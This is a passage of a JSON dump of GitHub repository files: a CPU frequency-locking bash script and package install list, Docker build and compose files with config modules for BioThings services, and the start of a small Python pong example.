"text": "#!/bin/bash\n# 1.0 nanosecond – cycle time for radio frequency 1 GHz (1×10^9 hertz), an inverse unit.\n\n\nA_FREQ=$(avblfreq=\"available frequency steps:\";cpupower -c 1 frequency-info | grep \"$avblfreq\" | sed \"s/$avblfreq//\" | sed \"s/ GHz,\\| GHz/GHz/g\" | xargs)\nFREQ=\"2.00GHz\"\nDEFAULT_GOVERNOR=\"powersave\"\n\n\n\nfunction check_freq(){\nif [[ \"$A_FREQ\" != *\"$FREQ\"* ]]; then\necho -e \"\\n$FREQ is not supported. See list: [ $A_FREQ ]\"\nexit 1;\nfi\n}\n\nfunction show_status(){\necho -e \"Current freq:\\n$(cpupower -c all frequency-info -mf)\"\necho -e \"Turbo boost: $(cat /sys/devices/system/cpu/cpufreq/boost)\"\n}\n\nfunction switch_on_lock(){\nshow_status\necho -e \"Want to freq: $FREQ on all cpus\"\ncheck_freq\nbash -c 'printf \"0\" > /sys/devices/system/cpu/cpufreq/boost'\ncpupower -c all frequency-set -f $FREQ > /dev/null \necho \"Done!\"\nshow_status\n}\n\nfunction switch_off_lock(){\ncpupower -c all frequency-set -g $DEFAULT_GOVERNOR > /dev/null\nbash -c 'printf \"1\" > /sys/devices/system/cpu/cpufreq/boost'\nshow_status\n}\n\n\n\nif [[ $EUID -ne 0 ]]; then\n echo \"This script must be run as root\" \n exit 1\nfi\n\ncase $1 in\n\t\"off\")\nswitch_off_lock;;\n\t\"on\")\nswitch_on_lock;;\n\t*)\necho \"Argument is missed! Expected [on, off]\";;\nesac\n\n\n"
},
{
"alpha_fraction": 0.7706552743911743,
"alphanum_fraction": 0.7706552743911743,
"avg_line_length": 49.14285659790039,
"blob_id": "b6ae926b36a93556bd7dd564482df9ef808e4e93",
"content_id": "ae6041f3ed27ad61c3911eddc9fe78a02fe2822d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 702,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 14,
"path": "/README.md",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "# BASH Utils\n\n* clear_cache.sh - clear linux memory cache\n* deploy.sh - deploy ubuntu \n* git_init_local_repo.sh - preinstall new git repo\n* java_install_alt.sh - remove jdk/bin/ alternatives for debian-based distro\n* java_rm_alt.sh - install jdk/bin/ alternatives for debian-based distro\n* lock_freq.sh - manage CPU freequency and turboboost mode for Intel-based processors\n* old_arm_toolset_deploy.sh - deploy arm toolchain\n* ps_snapshoot.sh - process snapshoot\n* touchpad.sh - manage touchpad script\n* translate.sh - simple translate script from autodetected language to Russian (via Google translater)\n* ullkd.sh - upgrade to newest Linux kernel\n* python/pretty_xml.py - Python pretty print adapter\n"
},
{
"alpha_fraction": 0.7629629373550415,
"alphanum_fraction": 0.770370364189148,
"avg_line_length": 26,
"blob_id": "d0e7fb153069eb9e017a6fa4c79c8b9bdc748151",
"content_id": "42d19f532006b3df5f2e49d8a499d568bef6fd10",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 135,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 5,
"path": "/python/pretty_xml.py",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "import sys\nfrom lxml import etree\nxml_str = sys.argv[0]\nroot = etree.fromstring(xml_str)\nprint etree.tostring(root, pretty_print=True)\n"
},
{
"alpha_fraction": 0.8048245906829834,
"alphanum_fraction": 0.8184210658073425,
"avg_line_length": 66.05882263183594,
"blob_id": "d3cd469963b4b10be28846f3e4e41d6358dfee8a",
"content_id": "b238441fac846d5402e19b437b4b0a2eb6624908",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2280,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 34,
"path": "/deploy.sh",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\napt-get install alsa-base alsa-utils ant autoconf automake autopoint \\\nbash bash-builtins bash-completion bash-doc bash-static bc binutils \\\nbzip2 chromium-browser chromium-browser-l10n chromium-codecs-ffmpeg-extra \\\ncmake colord coreutils cpio cpp cron cups curl dash dbus dbus-x11 dc \\\ndebconf debhelper debianutils dh-apparmor dh-autoreconf dh-python \\\ndoxygen dpkg espeak fakeroot firefox firefox-locale-en \\\nflashplugin-nonfree-extrasound \\\nfonts-dejavu fonts-dejavu-core fonts-dejavu-extra fonts-droid \\\nfonts-freefont-ttf fonts-horai-umefont fonts-kacst fonts-kacst-one \\\nfonts-khmeros-core fonts-lao fonts-lklug-sinhala fonts-lmodern fonts-lyx \\\nfonts-nanum fonts-opensymbol fonts-sil-abyssinica fonts-sil-gentium fonts-sil-gentium-basic \\\nfonts-sil-padauk fonts-takao-pgothic fonts-texgyre fonts-thai-tlwg fonts-tibetan-machine fonts-tlwg-garuda \\\nfonts-tlwg-kinnari fonts-tlwg-loma fonts-tlwg-mono fonts-tlwg-norasi fonts-tlwg-purisa \\\nfonts-tlwg-sawasdee fonts-tlwg-typewriter fonts-tlwg-typist fonts-tlwg-typo fonts-tlwg-umpush fonts-tlwg-waree \\\nfonts-unfonts-core fonts-wqy-microhei \\\nftp fuse g++ gcc gdb gimp git gitk gksu guitarix gzip ifupdown \\\nimagemagick indicator-application indicator-messages indicator-power indicator-sound \\\nlibreoffice iptables iw jack-capture jackd jackd2 jackd2-firewire \\\nlinux-headers-generic linux-image-generic linux-sound-base linux-source linuxdcpp \\\nlshw ltrace m4 make maven mawk mc mercurial mesa-utils mysql-client-5.6 \\\nmysql-client-core-5.6 mysql-common mysql-common-5.6 mysql-server-5.6 \\\nmysql-server-core-5.6 nasm net-tools \\\nnvidia-343 nvidia-343-uvm nvidia-opencl-icd-343 nvidia-prime nvidia-profiler \\\nnvidia-settings pastebinit patch pciutils perl pidgin \\\nplayonlinux ppp pppconfig pppoeconf pptp-linux pulseaudio python python-notify \\\npython2.7 python3 python3-pip qemu qjackctl qmmp rfkill sed smbclient socat \\\nsox speech-dispatcher speech-dispatcher-audio-plugins ssh stardict \\\nstardict-common stardict-gnome stardict-plugin stardict-plugin-espeak \\\nstardict-plugin-festival strace subversion sysv-rc sysv-rc-conf tcpdump \\\ntelnet texmaker timidity tuxguitar tuxguitar-alsa tuxguitar-jsa tuxguitar-oss \\\nunrar unzip vim vlc wget wine winetricks wireshark xfburn xinput xsel \\\nyakuake yasm zip \\\n"
}
] | 10 |
ravila4/biothings_docker
|
https://github.com/ravila4/biothings_docker
|
69a0b214a0c6458086d72e92e171d6fc934f1a40
|
7bfc928b617f6c89eef9667656bd803acff02200
|
5b9948dcd83d0d307bb74a331699f93b24a632de
|
refs/heads/master
| 2021-09-10T18:05:00.163970 | 2018-03-30T16:29:40 | 2018-03-30T16:29:40 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7566371560096741,
"alphanum_fraction": 0.7566371560096741,
"avg_line_length": 17.75,
"blob_id": "24b2529d9d254648fc1b73c5cd1c4166c2465a20",
"content_id": "f7ec3740fd041e99aa84a799385bb4882c7cd4ee",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 226,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 12,
"path": "/biothings.interactions/config.py",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "from config_www import *\nfrom config_hub import *\n\nGA_ACCOUNT = None\nGA_RUN_IN_PROD = True\n\nHIPCHAT_ROOM=None\nHIPCHAT_AUTH_TOKEN=None\n\nUSERQUERY_DIR='/data/userquery'\n\nAPP_GIT_REPOSITORY = '/usr/local/biothings.interactions'\n\n"
},
{
"alpha_fraction": 0.7067819237709045,
"alphanum_fraction": 0.7067819237709045,
"avg_line_length": 33.953487396240234,
"blob_id": "3a0bdba2c0bd618b5a971c5d48929736dffac05f",
"content_id": "e699ad2bc605fdd5b8807ed0ca0858e600536445",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1504,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 43,
"path": "/biothings.species/Dockerfile",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "################################################################################\n# BioThings.Species Dockerfile\n################################################################################\n# A Dockerfile that contains biothings.species\n\nFROM biothings.api\n\nMAINTAINER Greg Taylor \"[email protected]\"\n\n# Download the latest version of Biothings.Interactions\n#RUN git clone https://github.com/biothings/biothings.species.git /usr/local/biothings.species\nADD biothings.species /usr/local/biothings.species\n\n# Change directory to '/usr/local/biothings.species'\nWORKDIR /usr/local/biothings.species\n\n# Install the Docker specific setup files\nADD config.py /usr/local/biothings.species/src/\nADD config_hub.py /usr/local/biothings.species/src/\nADD config_www.py /usr/local/biothings.species/src/\n\n# Install SSH Keys for the image\n# - (they can be overwritten when the container is started)\nADD ssh_host_key /usr/local/biothings.species/src/bin/\nADD ssh_host_key.pub /usr/local/biothings.species/src/bin/\nADD biothings.pub /usr/local/biothings.species/src/bin/authorized_keys/\n\n# Setup the biothings.species hub data directory structure\nRUN mkdir /tmp/run\nRUN mkdir /data\nRUN mkdir /data/diff\nRUN mkdir /data/logs\nRUN mkdir /data/release\nRUN mkdir /data/userquery\n\n# Change directory to 'src'\nWORKDIR /usr/local/biothings.species/src\n\n# Set Environment variables needed to run the Hub\nENV PYTHONPATH $PYTHONPATH:/usr/local/biothings.species/src\n\n# Run the biothings.species server on container start\nCMD python bin/hub.py\n\n"
},
{
"alpha_fraction": 0.5277246832847595,
"alphanum_fraction": 0.5564053654670715,
"avg_line_length": 19.920000076293945,
"blob_id": "0befdc33af10b1e071e958cce69b7e16ac8f74cf",
"content_id": "f360a819049904324acc4e7731c9356adcd40ef3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "YAML",
"length_bytes": 523,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 25,
"path": "/biothings.species/docker-compose.yml",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "version: \"3.3\"\n\nservices:\n mongodb:\n container_name: \"mongodb\"\n image: \"mongo:3.2\"\n networks:\n - biothings\n\n elasticsearch:\n container_name: \"elasticsearch\"\n image: \"docker.elastic.co/elasticsearch/elasticsearch:5.6.4\"\n networks:\n - biothings\n\n biothings.species:\n container_name: \"biothings.species\"\n image: \"biothings.species\"\n ports:\n - 8022:8022\n networks:\n - biothings\n\nnetworks:\n biothings:\n"
},
{
"alpha_fraction": 0.5695309042930603,
"alphanum_fraction": 0.5803238153457642,
"avg_line_length": 33.89855194091797,
"blob_id": "26ab4e1c74e3c4c09f2f4937d81ee754c7cbadc5",
"content_id": "0e87e4afbc267515ab8bf639e0ca33df0c5b1109",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2409,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 69,
"path": "/mychem.info/config.py",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# *****************************************************************************\n# Elasticsearch variables\n# *****************************************************************************\n# elasticsearch server transport url\nES_HOST = 'elasticsearch:9200'\n# elasticsearch index name\nES_INDEX_NAME = 'mydrugs_current'\n# elasticsearch document type\nES_DOC_TYPE = 'drug'\n# Only these options are passed to the elasticsearch query from kwargs\nALLOWED_OPTIONS = ['_source', 'start', 'from_', 'size', 'fields',\n 'sort', 'explain', 'version', 'facets', 'fetch_all']\nES_SCROLL_TIME = '1m'\nES_SCROLL_SIZE = 1000\nES_SIZE_CAP = 1000\n# This is the module for loading the esq variable in handlers\nES_QUERY_MODULE = 'api.es'\n\n# *****************************************************************************\n# Google Analytics Settings\n# *****************************************************************************\n# Google Analytics Account ID\nGA_ACCOUNT = ''\n# Turn this to True to start google analytics tracking\nGA_RUN_IN_PROD = False\n\n# 'category' in google analytics event object\nGA_EVENT_CATEGORY = 'v1_api'\n# 'action' for get request in google analytics event object\nGA_EVENT_GET_ACTION = 'get'\n# 'action' for post request in google analytics event object\nGA_EVENT_POST_ACTION = 'post'\n# url for google analytics tracker\nGA_TRACKER_URL = 'MyDrugs.info'\n\n# *****************************************************************************\n# URL settings\n# *****************************************************************************\n# For URL stuff\nANNOTATION_ENDPOINT = 'drug'\nQUERY_ENDPOINT = 'query'\nAPI_VERSION = 'v1'\n# TODO Fill in a status id here\nSTATUS_CHECK_ID = ''\n# Path to a file containing a json object with information about elasticsearch fields\nFIELD_NOTES_PATH = ''\n# Path to a file containing a json object with the json-ld context information\nJSONLD_CONTEXT_PATH = ''\n\nDATA_SRC_SERVER = 'mongodb'\nDATA_SRC_PORT = 27017\nDATA_SRC_DATABASE = 'mychem_src'\nDATA_SRC_SERVER_USERNAME = ''\nDATA_SRC_SERVER_PASSWORD = ''\n\nDATA_TARGET_SERVER = 'mongodb'\nDATA_TARGET_PORT = 27017\nDATA_TARGET_DATABASE = 'mychem_target'\nDATA_TARGET_SERVER_USERNAME = ''\nDATA_TARGET_SERVER_PASSWORD = ''\n\n# DATA_ARCHIVE_ROOT = '/path/to/data/folder'\nDATA_ARCHIVE_ROOT = '/data'\nimport os\nDIFF_PATH = os.path.join(DATA_ARCHIVE_ROOT,\"diff\")\n\nfrom config_hub import *\nfrom config_web import *\n\n"
},
{
"alpha_fraction": 0.7293233275413513,
"alphanum_fraction": 0.7293233275413513,
"avg_line_length": 23.18181800842285,
"blob_id": "779fdbb32d68cd33b03e57141818a0a6837ecf81",
"content_id": "120aef0bc1a7bbe4c8cf745bc2d58d10419fc586",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 266,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 11,
"path": "/biothings.api/README.md",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "# Biothings.api docker container\n### Maintainer: Greg Taylor ([email protected])\n\nBuild a docker image containing the docker.api package and all required\npython packages.\n\n## Installation\n### Build the biothings.api Docker image\n```\ndocker build --no-cache -t biothings.api .\n```\n"
},
{
"alpha_fraction": 0.772141695022583,
"alphanum_fraction": 0.7761674523353577,
"avg_line_length": 31.657894134521484,
"blob_id": "2d579b551660427817cd6805bddff5a30eabbb8d",
"content_id": "f81f8db7a63ef8e6bb3313ccdb0387a7c7c3fa33",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1242,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 38,
"path": "/biothings.interactions/README.md",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "# Biothings.interactions docker container\n### Maintainer: Greg Taylor ([email protected])\n\nBuild a docker image containing the docker.interactions package.\nSetup a development docker host running all required docker services.\n\n\n## Installation\n### Prerequisites\nRun the following commands to generate the required ssh key pairs.\nThe first command generates a key pair for the ssh host and the\nsecond generates a key pair for an authorized hub user.\n```\nssh-keygen -f ssh_host_key\nssh-keygen -f biothings\n```\n\n### Build the biothings.api Docker image\n```\ndocker build --no-cache -t biothings.interactions .\n```\n\n### Run the biothings.interactions evaluation environment\n\nBefore you run the docker-compose command you should generate a ssh_host_key file with\n`ssh-keygen -f ssh_host_key`. This key file will be mounted into the correct location when\nthe collection of containers is started.\n\n```\ndocker-compose -f docker-compose-evaluation.yml up\n```\n\nThe following docker containers are started:\n\n- biothings.data - an nginx server containing randomized data\n- mongodb - the mongodb server running version 3.2\n- elasticsearch - the ElasticSearch server running version 5.6.4\n- biothings.interactions - the server built by the Dockerfile in this directory\n\n"
},
{
"alpha_fraction": 0.49986129999160767,
"alphanum_fraction": 0.5029126405715942,
"avg_line_length": 44.04999923706055,
"blob_id": "4c3d9d637c2ad3201583a4e436dad0b6b7b73810",
"content_id": "af62fef6f1ef571d8cc50185dd6e64104b0e316b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3605,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 80,
"path": "/biothings.species/config_www.py",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport os\nfrom biothings.web.settings.default import *\nfrom web.api.query_builder import ESQueryBuilder\nfrom web.api.query import ESQuery\nfrom web.api.transform import ESResultTransformer\nfrom web.api.handlers import TaxonHandler, QueryHandler, MetadataHandler, StatusHandler\n\n# *****************************************************************************\n# Elasticsearch variables\n# *****************************************************************************\n# elasticsearch server transport url\nES_HOST = 'elasticsearch:9200'\n# elasticsearch index name\nES_INDEX = 'taxonomy'\n# elasticsearch document type\nES_DOC_TYPE = 'taxon'\n# defautlt number_of_shards when create a new index\n#ES_NUMBER_OF_SHARDS = 5\n\nAPI_VERSION = 'v1'\n\n# *****************************************************************************\n# App URL Patterns\n# *****************************************************************************\nAPP_LIST = [\n (r\"/status\", StatusHandler),\n (r\"/metadata/?\", MetadataHandler),\n (r\"/metadata/fields/?\", MetadataHandler),\n (r\"/{}/taxon/(.+)/?\".format(API_VERSION), TaxonHandler),\n (r\"/{}/taxon/?$\".format(API_VERSION), TaxonHandler),\n (r\"/{}/query/?\".format(API_VERSION), QueryHandler),\n (r\"/{}/metadata/?\".format(API_VERSION), MetadataHandler),\n (r\"/{}/metadata/fields/?\".format(API_VERSION), MetadataHandler),\n]\n\n###############################################################################\n# app-specific query builder, query, and result transformer classes\n###############################################################################\n\n# *****************************************************************************\n# Subclass of biothings.www.api.es.query_builder.ESQueryBuilder to build\n# queries for this app\n# *****************************************************************************\nES_QUERY_BUILDER = ESQueryBuilder\n# *****************************************************************************\n# Subclass of biothings.www.api.es.query.ESQuery to execute queries for this app\n# *****************************************************************************\nES_QUERY = ESQuery\n# *****************************************************************************\n# Subclass of biothings.www.api.es.transform.ESResultTransformer to transform\n# ES results for this app\n# *****************************************************************************\nES_RESULT_TRANSFORMER = ESResultTransformer\n\nGA_ACTION_QUERY_GET = 'query_get'\nGA_ACTION_QUERY_POST = 'query_post'\nGA_ACTION_ANNOTATION_GET = 'species_get'\nGA_ACTION_ANNOTATION_POST = 'species_post'\nGA_TRACKER_URL = 't.biothings.io'\n\nHIPCHAT_MESSAGE_COLOR = 'purple'\n\nSTATUS_CHECK = {\n 'id': '9606',\n 'index': 'taxonomy',\n 'doc_type': 'taxon'\n}\n\n# KWARGS for taxon API\nDEFAULT_FALSE_BOOL_TYPEDEF = {'default': False, 'type': bool}\nANNOTATION_GET_TRANSFORM_KWARGS.update({'include_children': DEFAULT_FALSE_BOOL_TYPEDEF, \n 'has_gene': DEFAULT_FALSE_BOOL_TYPEDEF})\nANNOTATION_POST_TRANSFORM_KWARGS.update({'include_children': DEFAULT_FALSE_BOOL_TYPEDEF,\n 'has_gene': DEFAULT_FALSE_BOOL_TYPEDEF,\n 'expand_species': DEFAULT_FALSE_BOOL_TYPEDEF})\nQUERY_GET_TRANSFORM_KWARGS.update({'include_children': DEFAULT_FALSE_BOOL_TYPEDEF,\n 'has_gene': DEFAULT_FALSE_BOOL_TYPEDEF})\nQUERY_POST_TRANSFORM_KWARGS.update({'include_children': DEFAULT_FALSE_BOOL_TYPEDEF,\n 'has_gene': DEFAULT_FALSE_BOOL_TYPEDEF})\n\n"
},
{
"alpha_fraction": 0.7685459852218628,
"alphanum_fraction": 0.773491621017456,
"avg_line_length": 31.580644607543945,
"blob_id": "354486807b8211459299fdabd4f4946b24f36e8f",
"content_id": "7c125ed02382fc864b0f0a7cfec2a8f4e21c27ed",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1011,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 31,
"path": "/biothings.species/README.md",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "# Biothings.species docker container\n### Maintainer: Greg Taylor ([email protected])\n\nBuild a docker image containing the docker.species package.\nSetup a development docker host running all required docker services.\n\n## Installation\n\n### Copy the biothings.species directory to this local directory\n\n### Build the biothings.species Docker image\n```\ndocker build --no-cache -t biothings.species .\n```\n\n### Run the biothings.species evaluation environment\n\nBefore you run the docker-compose command you should generate a ssh_host_key file with\n`ssh-keygen -f ssh_host_key`. This key file will be mounted into the correct location when\nthe collection of containers is started.\n\n```\ndocker-compose -f docker-compose.yml up\n```\n\nThe following docker containers are started:\n\n- biothings.data - an nginx server containing randomized data\n- mongodb - the mongodb server running version 3.2\n- elasticsearch - the ElasticSearch server running version 5.6.4\n- biothings.species - the server built by the Dockerfile in this directory\n\n"
},
{
"alpha_fraction": 0.7947368621826172,
"alphanum_fraction": 0.7947368621826172,
"avg_line_length": 30.66666603088379,
"blob_id": "116fded64f81fac2b34862587567b40fb06d54a4",
"content_id": "3736cc79e540879c64d03a24a7c27b7b911d168c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 570,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 18,
"path": "/README.md",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "# biothings.docker\n## BioThings Docker containers\n### Maintainer: Greg Taylor ([email protected])\n\nThis repository contains files needed to build docker images and\nsetup docker hosts using these images.\n\n### biothings.api\nBuild a docker image containing the docker.api package and all required\npython packages.\n\n### biothings.data\nRandomize data files and setup an nginx-like continer for serving these\nfiles on a docker host.\n\n### biothings.interactions\nA Dockerfile for the biothings.interactions application together with a\ndocker-compose file needed to run all required services.\n"
},
{
"alpha_fraction": 0.5934230089187622,
"alphanum_fraction": 0.597907304763794,
"avg_line_length": 38.29411697387695,
"blob_id": "79807f4add79bf87b2f63e9113cc7beb2805932f",
"content_id": "34a394ee69210558c99cb72edd7961510d4712aa",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 669,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 17,
"path": "/biothings.api/Dockerfile",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "################################################################################\n# BioThings Dockerfile\n################################################################################\n# A Dockerfile that contains BioThings.api and the required python dependencies\n\nFROM python\n\nMAINTAINER Greg Taylor \"[email protected]\"\n\n# Download the latest version of Biothings.api\n# RUN git clone --branch v0.1.3 https://github.com/greg-k-taylor/biothings.api.git /usr/local/biothings.api\nADD biothings.api /usr/local/biothings.api\n\n# Install the Biothings.api required pip libraries\nWORKDIR /usr/local/biothings.api\nRUN pip install -r requirements.txt\nRUN pip install /usr/local/biothings.api\n\n"
},
{
"alpha_fraction": 0.7354130744934082,
"alphanum_fraction": 0.7388792634010315,
"avg_line_length": 35.82978820800781,
"blob_id": "3ec532ecf7ccd98ead92e156d0d75a3a7f9f75d9",
"content_id": "2bc2e586e3f145f79c904fa00100d944c418c2a2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1731,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 47,
"path": "/biothings.interactions/Dockerfile",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "################################################################################\n# BioThings.Interactions Dockerfile\n################################################################################\n# A Dockerfile that contains biothings.interactions\n\nFROM biothings.api\n\nMAINTAINER Greg Taylor \"[email protected]\"\n\n# Download the latest version of Biothings.Interactions\n# RUN git clone https://github.com/biothings/biothings.interactions.git /usr/local/biothings.interactions\n\n# Add the latest version of Biothings.Interactions\nADD biothings.interactions /usr/local/biothings.interactions\nRUN pip install /usr/local/biothings.interactions\n\n# Change directory to '/usr/local/biothings.interactions'\nWORKDIR /usr/local/biothings.interactions\n\n# Git Checkout the v0.1.0 tag\n# RUN git checkout tags/v0.1.2\n\n# Install the Docker specific setup files\nADD config.py /usr/local/biothings.interactions/biointeract/\nADD config_hub.py /usr/local/biothings.interactions/biointeract/\nADD config_www.py /usr/local/biothings.interactions/biointeract/\n\n# Install keys\nADD ssh_host_key /usr/local/biothings.interactions/biointeract/bin\nADD ssh_host_key.pub /usr/local/biothings.interactions/biointeract/bin\nADD biothings.pub /usr/local/biothings.interactions/biointeract/bin/authorized_keys/\n\n# Setup the biothings.interactions hub data directory structure\nRUN mkdir /data\nRUN mkdir /data/diff\nRUN mkdir /data/logs\nRUN mkdir /data/release\nRUN mkdir /data/userquery\n\n# Change directory to 'biointeract'\nWORKDIR /usr/local/biothings.interactions/biointeract\n\n# Set Environment variables needed to run the Hub\nENV PYTHONPATH $PYTHONPATH:/usr/local/biothings.interactions/biointeract\n\n# Run the biothings.interactions server on container start\nCMD python bin/hub.py\n"
},
{
"alpha_fraction": 0.687543511390686,
"alphanum_fraction": 0.687543511390686,
"avg_line_length": 30.217391967773438,
"blob_id": "fc1d6665e143daa04cad172cb9087f46da697964",
"content_id": "e97205c946d9ba4a9841ee611435fe2a272fc71d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1437,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 46,
"path": "/mychem.info/Dockerfile",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "################################################################################\n# BioThings.Species Dockerfile\n################################################################################\n# A Dockerfile that contains mychem.info\n\nFROM python\n\nMAINTAINER Greg Taylor \"[email protected]\"\n\n# Download the latest version of Biothings.Interactions\n#RUN git clone https://github.com/biothings/mychem.info.git /usr/local/mychem.info\nADD mychem.info /usr/local/mychem.info\n\n# Change directory to '/usr/local/mychem.info'\nWORKDIR /usr/local/mychem.info\n\n# Install python libraries\nRUN pip install -r requirements_hub.txt\nRUN pip install -r requirements_web.txt\n\n# Install the Docker specific setup files\nADD config.py /usr/local/mychem.info/src/\nADD config_hub.py /usr/local/mychem.info/src/\nADD config_web.py /usr/local/mychem.info/src/\n\n# Install SSH Keys for the image\n# - (they can be overwritten when the container is started)\nADD ssh_host_key /usr/local/mychem.info/src/bin/\nADD ssh_host_key.pub /usr/local/mychem.info/src/bin/\n\n# Setup the mychem.info hub data directory structure\nRUN mkdir /tmp/run\nRUN mkdir /data\nRUN mkdir /data/diff\nRUN mkdir /data/logs\nRUN mkdir /data/release\nRUN mkdir /data/userquery\n\n# Change directory to 'src'\nWORKDIR /usr/local/mychem.info/src\n\n# Set Environment variables needed to run the Hub\nENV PYTHONPATH $PYTHONPATH:/usr/local/mychem.info/src\n\n# Run the mychem.info server on container start\nCMD python bin/hub.py\n\n"
}
] | 12 |
adamlwgriffiths/ComPy
|
https://github.com/adamlwgriffiths/ComPy
|
d512f71c1a72f8503d0dae970fb9d9bd522e990e
|
daf13846ae66e158f3cc70990894e02c52377ecc
|
4fd0233d95191f063b6f42067e24f09889d4a132
|
refs/heads/master
| 2016-09-06T05:48:41.494310 | 2012-05-09T20:49:25 | 2012-05-09T20:49:25 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5352644920349121,
"alphanum_fraction": 0.5465995073318481,
"avg_line_length": 22.030303955078125,
"blob_id": "ca0f76077421f46eb538f28edd54215e785ab2aa",
"content_id": "a3132c990dea128144cc20844a6b886378d4b2ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1588,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 66,
"path": "/examples/pong/ball.py",
"repo_name": "adamlwgriffiths/ComPy",
"src_encoding": "UTF-8",
"text": "'''\r\nCreated on 10/05/2012\r\n\r\n@author: adam\r\n'''\r\n\r\nimport random\r\n\r\nfrom compy.entity import Entity\r\nfrom compy.component import Component\r\n\r\n\r\nclass BallMovementComponent( Component ):\r\n type = \"ball_movement\"\r\n \r\n def __init__( self, name ):\r\n super( BallMovementComponent, self ).__init__(\r\n BallMovementComponent.type,\r\n name\r\n )\r\n\r\n def update( self ):\r\n self.entity.data[ 'position' ] += self.entity.data[ 'velocity' ]\r\n\r\nclass BallContactComponent( Component ):\r\n type = \"ball_contact\"\r\n\r\n def __init__( self, name ):\r\n super( BallContactComponent, self ).__init__(\r\n BallContactComponent.type,\r\n name\r\n )\r\n\r\n def serve( self ):\r\n if self.entity == None:\r\n raise ValueError( \"Entity not set\" )\r\n\r\n # reset the ball's position\r\n self.entity.data[ 'position' ] = 0.0\r\n\r\n # select a velocity\r\n velocity = random.random()\r\n\r\n # pick a random direction\r\n if random.random() > 0.5:\r\n velocity *= -1.0\r\n\r\n # apply the velocity\r\n self.entity.data[ 'velocity' ] = velocity\r\n\r\n def hit( self, velocity ):\r\n # set our velocity\r\n self.entity.data[ 'velocity' ] = velocity\r\n\r\n\r\ndef create():\r\n entity = Entity( \"ball\" )\r\n entity.add_component(\r\n BallMovementComponent( 'movement' )\r\n )\r\n entity.add_component(\r\n BallContactComponent( 'contact' )\r\n )\r\n entity.data[ 'position' ] = 0.0\r\n entity.data[ 'velocity' ] = 0.0\r\n return entity\r\n\r\n"
},
{
"alpha_fraction": 0.5136584043502808,
"alphanum_fraction": 0.5200408697128296,
"avg_line_length": 25,
"blob_id": "71a7f5ce36f8550dd5286e545286970939dc47bd",
"content_id": "17366d085bc654dee67691b7e1ddf75c652548ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3917,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 145,
"path": "/examples/pong/bat.py",
"repo_name": "adamlwgriffiths/ComPy",
"src_encoding": "UTF-8",
